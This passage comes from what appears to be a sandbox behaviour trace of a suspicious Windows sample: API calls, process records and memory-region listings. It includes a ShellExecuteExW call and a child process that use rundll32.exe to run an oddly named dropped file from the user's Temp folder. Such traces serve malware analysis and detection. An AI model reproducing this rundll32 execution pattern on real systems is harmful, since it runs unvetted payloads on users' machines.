lpBuffer="C:\\Windows\\system32\\rundll32.exe", lpFilePart=0x0) returned 0x20 [0201.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e060) returned 1 [0201.595] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe"), fInfoLevelId=0x0, lpFileInformation=0xafa508e140 | out: lpFileInformation=0xafa508e140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243194a3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x243194a3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x243194a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe800)) returned 1 [0201.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0201.598] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0201.619] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x2386d71e050 [0201.619] LocalAlloc (uFlags=0x0, uBytes=0x94) returned 0x2386d723ac0 [0201.619] LocalAlloc (uFlags=0x0, uBytes=0x28) returned 0x2386d642620 [0201.621] ShellExecuteExW (in: pExecInfo=0x238007c7ac8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\system32\\rundll32.exe", lpParameters="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence Nikn ", lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x238007c7ac8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\system32\\rundll32.exe", lpParameters="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence Nikn ", lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x910)) returned 1 [0201.812] LocalFree (hMem=0x2386d71e050) returned 0x0 [0201.813] LocalFree (hMem=0x2386d723ac0) returned 0x0 [0201.813] LocalFree (hMem=0x2386d642620) returned 0x0 [0201.813] EtwEventActivityIdControl () returned 0x0 [0201.818] EtwEventActivityIdControl () returned 0x0 [0201.818] EtwEventActivityIdControl () returned 0x0 [0201.818] EtwEventActivityIdControl () returned 0x0 [0201.818] EtwEventActivityIdControl () returned 0x0 [0201.819] SetEvent (hEvent=0x58c) returned 1 [0201.819] SetEvent (hEvent=0x590) returned 1 [0201.819] SetEvent (hEvent=0x584) returned 1 [0201.819] SetEvent (hEvent=0x578) returned 1 [0201.819] SetEvent (hEvent=0x588) returned 1 [0201.819] SetEvent (hEvent=0x57c) returned 1 [0201.819] SetEvent (hEvent=0x574) returned 1 [0201.819] SetEvent (hEvent=0x594) returned 1 [0201.820] SetEvent (hEvent=0x598) returned 1 [0201.820] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508ef90*=0x5a0, lpdwindex=0xafa508ed64 | out: lpdwindex=0xafa508ed64) returned 0x0 [0201.839] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.911] CoCreateGuid (in: pguid=0xafa508ee48 | out: pguid=0xafa508ee48*(Data1=0x816495fe, Data2=0xd699, Data3=0x440b, Data4=([0]=0x99, [1]=0xb7, [2]=0x99, [3]=0xe0, [4]=0x7c, [5]=0x2d, [6]=0x26, [7]=0x3f))) returned 0x0 [0201.912] AmsiOpenSession () returned 0x0 [0201.912] AmsiScanString () returned 0x80070015 [0201.937] EtwEventActivityIdControl () returned 0x0 [0201.937] EtwEventActivityIdControl () returned 0x0 [0201.937] EtwEventActivityIdControl () returned 0x0 [0203.163] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0xafa508e5f0*=0x904, lpdwindex=0xafa508e3e4 | out: lpdwindex=0xafa508e3e4) returned 0x0 [0203.165] SetEvent (hEvent=0x8a0) returned 1 [0203.165] SetEvent (hEvent=0x904) returned 1 [0203.165] EtwEventActivityIdControl () returned 0x0 [0203.165] SetEvent (hEvent=0x91c) returned 1 [0203.165] SetEvent (hEvent=0x8a0) returned 1 [0203.165] SetEvent (hEvent=0x904) returned 1 [0203.165] SetEvent (hEvent=0x92c) returned 1 [0203.165] SetEvent (hEvent=0x920) returned 1 [0203.165] SetEvent (hEvent=0x924) returned 1 [0203.165] SetEvent (hEvent=0x928) returned 1 [0203.165] SetEvent (hEvent=0x930) returned 1 [0203.440] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508ef90*=0x5a0, lpdwindex=0xafa508ed64 | out: lpdwindex=0xafa508ed64) returned 0x0 [0204.254] CoGetContextToken (in: pToken=0xafa508f830 | out: pToken=0xafa508f830) returned 0x0 [0204.255] CoUninitialize () [0204.281] GenericStreamBase::Read () returned 0x0 [0204.281] GenericStreamBase::Read () returned 0x0 [0204.281] GenericStreamBase::Read () returned 0x0 Thread: id = 29 os_tid = 0x1228 Thread: id = 30 os_tid = 0x1220 [0149.478] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0149.480] CoGetContextToken (in: pToken=0xafa518f4d0 | out: pToken=0xafa518f4d0) returned 0x0 [0149.480] CObjectContext::QueryInterface () returned 0x0 [0149.480] CObjectContext::GetCurrentThreadType () returned 0x0 [0149.480] Release () returned 0x0 [0149.480] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0149.480] CoUninitialize () [0149.480] RoInitialize () returned 0x1 [0149.480] RoUninitialize () returned 0x0 [0181.212] CoUninitialize () Thread: id = 31 os_tid = 0x1218 Thread: id = 32 os_tid = 0x1210 Thread: id = 33 os_tid = 0x120c [0158.689] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0158.691] CoGetContextToken (in: pToken=0xafa528f780 | out: pToken=0xafa528f780) returned 0x0 [0158.691] CObjectContext::QueryInterface () returned 0x0 [0158.691] CObjectContext::GetCurrentThreadType () returned 0x0 [0158.691] Release () returned 0x0 [0158.691] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0158.691] CoUninitialize () [0158.691] RoInitialize () returned 0x1 [0158.691] RoUninitialize () returned 0x0 [0182.430] CoUninitialize () Thread: id = 34 os_tid = 0x11f8 Thread: id = 35 os_tid = 0x1204 Thread: id = 36 os_tid = 0x1200 [0169.176] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0169.176] RoInitialize () returned 0x1 [0169.176] RoUninitialize () returned 0x0 [0169.180] ResetEvent (hEvent=0x6f4) returned 1 Thread: id = 37 os_tid = 0x11f4 Thread: id = 38 os_tid = 0x1230 Thread: id = 39 os_tid = 0x125c Thread: id = 40 os_tid = 0x127c [0186.528] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0186.530] CoGetContextToken (in: pToken=0xafa554f2f0 | out: pToken=0xafa554f2f0) returned 0x0 [0186.530] CObjectContext::QueryInterface () returned 0x0 [0186.530] CObjectContext::GetCurrentThreadType () returned 0x0 [0186.530] Release () returned 0x0 [0186.530] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0186.530] CoUninitialize () [0186.530] RoInitialize () returned 0x1 [0186.530] RoUninitialize () returned 0x0 Thread: id = 41 os_tid = 0x674 [0186.797] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0186.798] CoGetContextToken (in: pToken=0xafa55cf490 | out: pToken=0xafa55cf490) returned 0x0 [0186.798] CObjectContext::QueryInterface () returned 0x0 [0186.798] CObjectContext::GetCurrentThreadType () returned 0x0 [0186.798] Release () returned 0x0 [0186.798] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0186.798] CoUninitialize () [0186.798] RoInitialize () returned 0x1 [0186.798] RoUninitialize () returned 0x0 Thread: id = 42 os_tid = 0x11d0 Thread: id = 43 os_tid = 0x1338 Thread: id = 46 os_tid = 0x1044 Thread: id = 48 os_tid = 0x814 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4dae0000" os_pid = "0x7c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x10ac" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f188" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 472 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 473 start_va = 0x375dd50000 end_va = 0x375dd8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000375dd50000" filename = "" Region: id = 474 start_va = 0x375de00000 end_va = 0x375dffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000375de00000" filename = "" Region: id = 475 start_va = 0x179c1f80000 end_va = 0x179c1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c1f80000" filename = "" Region: id = 476 start_va = 0x179c1fa0000 end_va = 0x179c1fb4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c1fa0000" filename = "" Region: id = 477 start_va = 0x7df5ffd90000 end_va = 0x7ff5ffd8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd90000" filename = "" Region: id = 478 start_va = 0x7ff737500000 end_va = 0x7ff737522fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff737500000" filename = "" Region: id = 479 start_va = 0x7ff737580000 end_va = 0x7ff737590fff monitored = 0 entry_point = 0x7ff7375816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 480 start_va = 0x7ff871e00000 end_va = 0x7ff871fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 481 start_va = 0x179c1fc0000 end_va = 0x179c212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c1fc0000" filename = "" Region: id = 482 start_va = 0x7ff871bc0000 end_va = 0x7ff871c6cfff monitored = 0 entry_point = 0x7ff871bd81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 483 start_va = 0x7ff86e520000 end_va = 0x7ff86e707fff monitored = 0 entry_point = 0x7ff86e54ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 484 start_va = 0x179c1f80000 end_va = 0x179c1f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c1f80000" filename = "" Region: id = 485 start_va = 0x7ff737400000 end_va = 0x7ff7374fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff737400000" filename = "" Region: id = 486 start_va = 0x179c2130000 end_va = 0x179c21edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 487 start_va = 0x7ff86f210000 end_va = 0x7ff86f2acfff monitored = 0 entry_point = 0x7ff86f2178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 488 start_va = 0x375dd90000 end_va = 0x375ddcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000375dd90000" filename = "" Region: id = 489 start_va = 0x179c21f0000 end_va = 0x179c23effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c21f0000" filename = "" Region: id = 490 start_va = 0x179c1f90000 end_va = 0x179c1f96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c1f90000" filename = "" Region: id = 491 start_va = 0x7ff85ca00000 end_va = 0x7ff85ca58fff monitored = 0 entry_point = 0x7ff85ca0fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 492 start_va = 0x179c1fc0000 end_va = 0x179c1fc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c1fc0000" filename = "" Region: id = 493 start_va = 0x179c2030000 end_va = 0x179c212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c2030000" filename = "" Region: id = 494 start_va = 0x7ff86f2b0000 end_va = 0x7ff86f52cfff monitored = 0 entry_point = 0x7ff86f384970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 495 start_va = 0x7ff870fd0000 end_va = 0x7ff8710ebfff monitored = 0 entry_point = 0x7ff8710102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 496 start_va = 0x7ff86e4b0000 end_va = 0x7ff86e519fff monitored = 0 entry_point = 0x7ff86e4e6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 497 start_va = 0x7ff8719b0000 end_va = 0x7ff871b05fff monitored = 0 entry_point = 0x7ff8719ba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 498 start_va = 0x7ff871c70000 end_va = 0x7ff871df5fff monitored = 0 entry_point = 0x7ff871cbffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 499 start_va = 0x179c1fd0000 end_va = 0x179c1fd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c1fd0000" filename = "" Region: id = 500 start_va = 0x7ff871860000 end_va = 0x7ff8719a2fff monitored = 0 entry_point = 0x7ff871888210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 501 start_va = 0x7ff86f5b0000 end_va = 0x7ff86f60afff monitored = 0 entry_point = 0x7ff86f5c38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 502 start_va = 0x7ff8711c0000 end_va = 0x7ff8711fafff monitored = 0 entry_point = 0x7ff8711c12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 503 start_va = 0x7ff8710f0000 end_va = 0x7ff8711b0fff monitored = 0 entry_point = 0x7ff871110da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 504 start_va = 0x7ff86c9a0000 end_va = 0x7ff86cb25fff monitored = 0 entry_point = 0x7ff86c9ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 505 start_va = 0x179c1fe0000 end_va = 0x179c1fe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c1fe0000" filename = "" Region: id = 506 start_va = 0x179c1ff0000 end_va = 0x179c1ff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c1ff0000" filename = "" Region: id = 507 start_va = 0x179c21f0000 end_va = 0x179c2377fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c21f0000" filename = "" Region: id = 508 start_va = 0x179c23e0000 end_va = 0x179c23effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c23e0000" filename = "" Region: id = 509 start_va = 0x179c23f0000 end_va = 0x179c2570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c23f0000" filename = "" Region: id = 510 start_va = 0x179c2580000 end_va = 0x179c397ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c2580000" filename = "" Region: id = 511 start_va = 0x179c3980000 end_va = 0x179c3aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c3980000" filename = "" Region: id = 512 start_va = 0x375e000000 end_va = 0x375e03ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000375e000000" filename = "" Region: id = 513 start_va = 0x7ff86f9f0000 end_va = 0x7ff870f4efff monitored = 0 entry_point = 0x7ff86fb511f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 514 start_va = 0x7ff86f130000 end_va = 0x7ff86f172fff monitored = 0 entry_point = 0x7ff86f144b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 515 start_va = 0x7ff86e990000 end_va = 0x7ff86efd3fff monitored = 0 entry_point = 0x7ff86eb564b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 516 start_va = 0x7ff871b10000 end_va = 0x7ff871bb6fff monitored = 0 entry_point = 0x7ff871b258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 517 start_va = 0x7ff86f550000 end_va = 0x7ff86f5a1fff monitored = 0 entry_point = 0x7ff86f55f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 518 start_va = 0x7ff86e490000 end_va = 0x7ff86e49efff monitored = 0 entry_point = 0x7ff86e493210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 519 start_va = 0x7ff86f070000 end_va = 0x7ff86f124fff monitored = 0 entry_point = 0x7ff86f0b22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 520 start_va = 0x7ff86e420000 end_va = 0x7ff86e46afff monitored = 0 entry_point = 0x7ff86e4235f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 521 start_va = 0x7ff86e470000 end_va = 0x7ff86e483fff monitored = 0 entry_point = 0x7ff86e4752e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 522 start_va = 0x7ff86cda0000 end_va = 0x7ff86ce35fff monitored = 0 entry_point = 0x7ff86cdc5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 523 start_va = 0x179c3af0000 end_va = 0x179c3ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c3af0000" filename = "" Region: id = 524 start_va = 0x179c3cf0000 end_va = 0x179c4026fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 525 start_va = 0x179c3980000 end_va = 0x179c3a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c3980000" filename = "" Region: id = 526 start_va = 0x179c3ae0000 end_va = 0x179c3aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c3ae0000" filename = "" Region: id = 527 start_va = 0x179c4030000 end_va = 0x179c422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c4030000" filename = "" Region: id = 528 start_va = 0x375e040000 end_va = 0x375e07ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000375e040000" filename = "" Region: id = 529 start_va = 0x7ff86f890000 end_va = 0x7ff86f9e9fff monitored = 0 entry_point = 0x7ff86f8d38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 530 start_va = 0x179c2000000 end_va = 0x179c2000fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c2000000" filename = "" Region: id = 531 start_va = 0x179c3af0000 end_va = 0x179c3babfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c3af0000" filename = "" Region: id = 532 start_va = 0x179c3ce0000 end_va = 0x179c3ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c3ce0000" filename = "" Region: id = 533 start_va = 0x179c2000000 end_va = 0x179c2003fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c2000000" filename = "" Region: id = 534 start_va = 0x7ff86bf40000 end_va = 0x7ff86bf61fff monitored = 0 entry_point = 0x7ff86bf41a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 535 start_va = 0x7ff86cb90000 end_va = 0x7ff86cba2fff monitored = 0 entry_point = 0x7ff86cb92760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 536 start_va = 0x7ff86e230000 end_va = 0x7ff86e285fff monitored = 0 entry_point = 0x7ff86e240bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 537 start_va = 0x179c2010000 end_va = 0x179c2016fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000179c2010000" filename = "" Region: id = 538 start_va = 0x179c2020000 end_va = 0x179c2020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c2020000" filename = "" Region: id = 539 start_va = 0x179c2380000 end_va = 0x179c2380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c2380000" filename = "" Region: id = 540 start_va = 0x179c2390000 end_va = 0x179c2394fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 541 start_va = 0x179c23a0000 end_va = 0x179c23a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 542 start_va = 0x179c23b0000 end_va = 0x179c23b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c23b0000" filename = "" Region: id = 543 start_va = 0x7ff863b30000 end_va = 0x7ff863da3fff monitored = 0 entry_point = 0x7ff863ba0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 544 start_va = 0x179c23c0000 end_va = 0x179c23c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 545 start_va = 0x179c23d0000 end_va = 0x179c23d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000179c23d0000" filename = "" Thread: id = 15 os_tid = 0x1174 Thread: id = 16 os_tid = 0x1170 Thread: id = 17 os_tid = 0x1160 Thread: id = 18 os_tid = 0x1168 Process: id = "5" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x10912000" os_pid = "0x11b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x10ac" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence Nikn " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f188" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 937 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 938 start_va = 0xa1630f0000 end_va = 0xa16316ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a1630f0000" filename = "" Region: id = 939 start_va = 0xa163200000 end_va = 0xa1633fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a163200000" filename = "" Region: id = 940 start_va = 0x1e397b70000 end_va = 0x1e397b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397b70000" filename = "" Region: id = 941 start_va = 0x1e397b90000 end_va = 0x1e397ba4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397b90000" filename = "" Region: id = 942 start_va = 0x1e397bb0000 end_va = 0x1e397bb3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397bb0000" filename = "" Region: id = 943 start_va = 0x1e397bc0000 end_va = 0x1e397bc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397bc0000" filename = "" Region: id = 944 start_va = 0x1e397bd0000 end_va = 0x1e397bd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397bd0000" filename = "" Region: id = 945 start_va = 0x7df5ffa50000 end_va = 0x7ff5ffa4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa50000" filename = "" Region: id = 946 start_va = 0x7ff6a9be0000 end_va = 0x7ff6a9c02fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6a9be0000" filename = "" Region: id = 947 start_va = 0x7ff6aa120000 end_va = 0x7ff6aa133fff monitored = 0 entry_point = 0x7ff6aa124270 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\System32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe") Region: id = 948 start_va = 0x7ff871e00000 end_va = 0x7ff871fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 949 start_va = 0x1e397be0000 end_va = 0x1e397d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397be0000" filename = "" Region: id = 950 start_va = 0x7ff871bc0000 end_va = 0x7ff871c6cfff monitored = 0 entry_point = 0x7ff871bd81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 951 start_va = 0x7ff86e520000 end_va = 0x7ff86e707fff monitored = 0 entry_point = 0x7ff86e54ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 952 start_va = 0x1e397b70000 end_va = 0x1e397b7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397b70000" filename = "" Region: id = 953 